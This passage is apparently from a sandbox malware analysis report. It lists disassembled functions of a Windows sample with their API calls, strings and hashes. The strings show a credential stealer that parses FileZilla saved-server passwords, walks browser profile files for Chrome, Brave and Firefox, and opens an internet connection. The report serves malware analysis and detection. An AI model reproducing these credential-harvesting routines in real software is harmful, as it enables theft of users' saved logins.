                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$FileFindFirst
                            • String ID: \*.*
                            • API String ID: 712834838-1173974218
                            • Opcode ID: 8564b0b6874422f512ea87584fa967ae5b0498230883abbfa8cea784ba61a8af
                            • Instruction ID: 22e9a4ddd07a06c3d1995ea41727f92ec6903b253057cf3f5dbd139ac26d02ee
                            • Opcode Fuzzy Hash: 8564b0b6874422f512ea87584fa967ae5b0498230883abbfa8cea784ba61a8af
                            • Instruction Fuzzy Hash: 0362BD30911636ABCB22EF64EC89BAFB7BDAF59701F040525F805A7265DB34DD05CBA0
                            Function 00133A70 Relevance: 144.4, APIs: 81, Strings: 1, Instructions: 869stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • wsprintfA.USER32 ref: 00133A8C
                            • FindFirstFileA.KERNEL32(?,?), ref: 00133AA3
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 00133ACC
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 00133AE6
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00133B1F
                            • lstrcpy.KERNEL32(00000000,?), ref: 00133B47
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133B52
                            • lstrlen.KERNEL32(0015179C), ref: 00133B5D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133B7A
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133B86
                            • lstrlen.KERNEL32(?), ref: 00133B93
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133BB3
                            • lstrcat.KERNEL32(00000000,?), ref: 00133BC1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133BEA
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00133C2E
                            • lstrlen.KERNEL32(?), ref: 00133C38
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133C65
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133C70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133C96
                            • lstrlen.KERNEL32(0015179C), ref: 00133CA8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133CCA
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133CD6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133CFE
                            • lstrlen.KERNEL32(?), ref: 00133D12
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133D32
                            • lstrcat.KERNEL32(00000000,?), ref: 00133D40
                            • lstrlen.KERNEL32(013F8FF8), ref: 00133D6B
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133D91
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133D9C
                            • lstrlen.KERNEL32(013F9058), ref: 00133DBE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133DE4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133DEF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133E17
                            • lstrlen.KERNEL32(0015179C), ref: 00133E29
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133E48
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133E54
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133E7A
                            • lstrcpy.KERNEL32(00000000,?), ref: 00133EA7
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133EB2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133ED9
                            • lstrlen.KERNEL32(0015179C), ref: 00133EEB
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133F0D
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133F19
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133F42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133F71
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00133F7C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133FA3
                            • lstrlen.KERNEL32(0015179C), ref: 00133FB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00133FD7
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00133FE3
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013400C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013403B
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134046
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013406D
                            • lstrlen.KERNEL32(0015179C), ref: 0013407F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001340A1
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 001340AD
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001340D5
                            • lstrlen.KERNEL32(?), ref: 001340E9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134109
                            • lstrcat.KERNEL32(00000000,?), ref: 00134117
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134140
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0013417F
                            • lstrlen.KERNEL32(013FD448), ref: 0013418E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001341B6
                            • lstrcat.KERNEL32(00000000,00000000), ref: 001341C1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001341EA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013422E
                            • lstrcat.KERNEL32(00000000), ref: 0013423B
                            • FindNextFileA.KERNEL32(00000000,?), ref: 00134439
                            • FindClose.KERNEL32(00000000), ref: 00134448
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$lstrlen$Find$File$CloseFirstNextwsprintf
                            • String ID: %s\*.*
                            • API String ID: 1006159827-1013718255
                            • Opcode ID: 78163236a9f7e822f981b9101e530cd209947d401bc5d20b71db183d8556bcef
                            • Instruction ID: fbd39d0559a015b8f952b3f98940c6e946dcebf8e774d8f5d4c52cf95a3bea5b
                            • Opcode Fuzzy Hash: 78163236a9f7e822f981b9101e530cd209947d401bc5d20b71db183d8556bcef
                            • Instruction Fuzzy Hash: 9E62B031911736EBCB22EF64EC49AAEB7BDAF54301F044129F815A7660DB34EE45CB90
                            Function 00136AA0 Relevance: 144.3, APIs: 72, Strings: 10, Instructions: 763stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136AD5
                            • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 00136B08
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136B42
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136B69
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00136B74
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136B9D
                            • lstrlen.KERNEL32(\AppData\Roaming\FileZilla\recentservers.xml), ref: 00136BB7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136BD9
                            • lstrcat.KERNEL32(00000000,\AppData\Roaming\FileZilla\recentservers.xml), ref: 00136BE5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136C10
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136C40
                            • LocalAlloc.KERNEL32(00000040,?), ref: 00136C75
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136CDD
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D0D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$AllocFolderLocalPathlstrlen
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 313953988-555421843
                            • Opcode ID: 626cb9f37a9d5bec0e9bd5bc1e9936369aeb8539b91c8e11f49f236f8c164fb8
                            • Instruction ID: 85a4ab8a1b7ae1a4332d030610dfcc0dea1e5f25c9e3307f765a10dfc82ce458
                            • Opcode Fuzzy Hash: 626cb9f37a9d5bec0e9bd5bc1e9936369aeb8539b91c8e11f49f236f8c164fb8
                            • Instruction Fuzzy Hash: F242A370A01326FBDB22EBB0EC49BAE7BB9AF15705F045525F801E72A1DB34D905CB90
                            Function 001260D0 Relevance: 119.8, APIs: 66, Strings: 2, Instructions: 818stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 001260FF
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126152
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126185
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001261B5
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001261F0
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00126223
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00126233
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: fc9aff9a6e2e6654f7893953688510b0b218f037c786a579d78cf6c246f869a0
                            • Instruction ID: 005886008792f778c92d6d8f373372f608429aea6ec67ef0f161a4f3400b2fba
                            • Opcode Fuzzy Hash: fc9aff9a6e2e6654f7893953688510b0b218f037c786a579d78cf6c246f869a0
                            • Instruction Fuzzy Hash: C8527B71D00236ABCB21EF74EC49BAE77B9AF58305F144524F805AB2A5DB34ED12CB90
                            Function 00136CB9 Relevance: 110.8, APIs: 54, Strings: 9, Instructions: 536stringmemoryencryptionCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136CDD
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D0D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D3D
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00136D6F
                            • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 00136D7C
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00136D83
                            • StrStrA.SHLWAPI(00000000,<Host>), ref: 00136D9A
                            • lstrlen.KERNEL32(00000000), ref: 00136DA5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136DE8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136E0F
                            • StrStrA.SHLWAPI(00000000,<Port>), ref: 00136E22
                            • lstrlen.KERNEL32(00000000), ref: 00136E2D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136E70
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136E97
                            • StrStrA.SHLWAPI(00000000,<User>), ref: 00136EAA
                            • lstrlen.KERNEL32(00000000), ref: 00136EB5
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136EF8
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136F1F
                            • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00136F32
                            • lstrlen.KERNEL32(00000000), ref: 00136F41
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136F89
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00136FB1
                            • CryptStringToBinaryA.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 00136FD4
                            • LocalAlloc.KERNEL32(00000040,00000000), ref: 00136FE8
                            • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00000000,00000000,00000000), ref: 00137009
                            • LocalFree.KERNEL32(00000000), ref: 00137014
                            • lstrlen.KERNEL32(?), ref: 001370AE
                            • lstrlen.KERNEL32(?), ref: 001370C1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$BinaryCryptHeapLocalString$AllocAllocateFreeProcess
                            • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$browser: FileZilla$login: $password: $profile: null$url:
                            • API String ID: 2641759534-2314656281
                            • Opcode ID: 351ac65bd331e26d6b12b2b69478775dfc9f672a81c8f9a9aa73ef2b15daad58
                            • Instruction ID: 86c9c377c9586c4d4d46c4e082c3ec18fde51e8aa6e1f9d85714301e8cb1c9ac
                            • Opcode Fuzzy Hash: 351ac65bd331e26d6b12b2b69478775dfc9f672a81c8f9a9aa73ef2b15daad58
                            • Instruction Fuzzy Hash: 18029F70A11326FFCB21EBB0EC49BAE7BB9AF19705F145515F802E72A1DB34D90587A0
                            Function 0012DB80 Relevance: 92.3, APIs: 48, Strings: 4, Instructions: 1271stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012DBD3
                            • lstrcpy.KERNEL32(00000000,?), ref: 0012DC1E
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012DC5F
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 0012DC8F
                            • FindFirstFileA.KERNEL32(?,?), ref: 0012DCA0
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$FileFindFirst
                            • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                            • API String ID: 157892242-726946144
                            • Opcode ID: f925cea8f8f17e8af516d026339d0390d3ce3de14993b10bb2325e58346ba722
                            • Instruction ID: b6194a03241a2356792a763d7b8173db8ea584fd036354051c653165eab6634e
                            • Opcode Fuzzy Hash: f925cea8f8f17e8af516d026339d0390d3ce3de14993b10bb2325e58346ba722
                            • Instruction Fuzzy Hash: E0B2AD70A013259FCF24EF64E845B9E77F4BF58314F188569E809AB2A1DB30EC55CB90
                            Function 00134C70 Relevance: 79.8, APIs: 44, Strings: 1, Instructions: 1095stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 00134CB1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134CD4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00134CDF
                            • lstrlen.KERNEL32(00154CAC), ref: 00134CEA
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D07
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00134D13
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00134D3E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 00134D5A
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, Offset: 00120000, based on PE: true
                            • Associated: 00000000.00000002.2080948786.0000000000120000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000157000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001B6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.00000000001CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2080969358.0000000000358000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081238770.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000036C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.00000000005DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.000000000060B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000611000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081251756.0000000000621000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081461826.0000000000622000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081560769.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2081575698.00000000007CA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_120000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                            • String ID: prefs.js
                            • API String ID: 2567437900-3783873740
                            • Opcode ID: e87dc76ed010d85c4bf6a9497d27bc1333b712c933b322b034a1c20338040f30
                            • Instruction ID: 375efce9525021a7b7bb4b508534bc2c0aec79f1e4ec2900bd8b0a9ede8dea05
                            • Opcode Fuzzy Hash: e87dc76ed010d85c4bf6a9497d27bc1333b712c933b322b034a1c20338040f30
                            • Instruction Fuzzy Hash: 06923E70A01B11DFDB25CF29D949B6AB7F6AF44715F1980ADE8099B2A1D731EC42CB80
                            Function 001313A0 Relevance: 62.0, APIs: 41, Instructions: 525stringfileCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001313E1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131404
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0013140F
                            • lstrlen.KERNEL32(00154CAC), ref: 0013141A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131437
                            • lstrcat.KERNEL32(00000000,00154CAC), ref: 00131443
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013146E
                            • FindFirstFileA.KERNEL32(00000000,?), ref: 0013148A
                            • StrCmpCA.SHLWAPI(?,001517A8), ref: 001314AC
                            • StrCmpCA.SHLWAPI(?,001517AC), ref: 001314C6
                            • lstrcpy.KERNEL32(00000000,0014CFF4), ref: 001314FF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131527
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00131532
                            • lstrlen.KERNEL32(0015179C), ref: 0013153D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013155A
                            • lstrcat.KERNEL32(00000000,0015179C), ref: 00131566
                            • lstrlen.KERNEL32(?), ref: 00131573
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131593
                            • lstrcat.KERNEL32(00000000,?), ref: 001315A1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 001315CA
                            • StrCmpCA.SHLWAPI(?,013FD388), ref: 001315F3
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131634
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013165D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131685
                            • StrCmpCA.SHLWAPI(?,013FD758), ref: 001316A2
                            • lstrcpy.KERNEL32(00000000,?), ref: 001316E3
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013170C
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131734
                            • StrCmpCA.SHLWAPI(?,013FD490), ref: 00131752
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131783
                            • lstrcpy.KERNEL32(00000000,?), ref: 001317AC
                            • lstrcpy.KERNEL32(00000000,?), ref: 001317D5
                            • StrCmpCA.SHLWAPI(?,013FD538), ref: 00131803
                            • lstrcpy.KERNEL32(00000000,?), ref: 00131844
                            • lstrcpy.KERNEL32(00000000,?), ref: 0013186D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00131895
                            • lstrcpy.KERNEL32(00000000,?), ref: 001318E6
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 0013190E
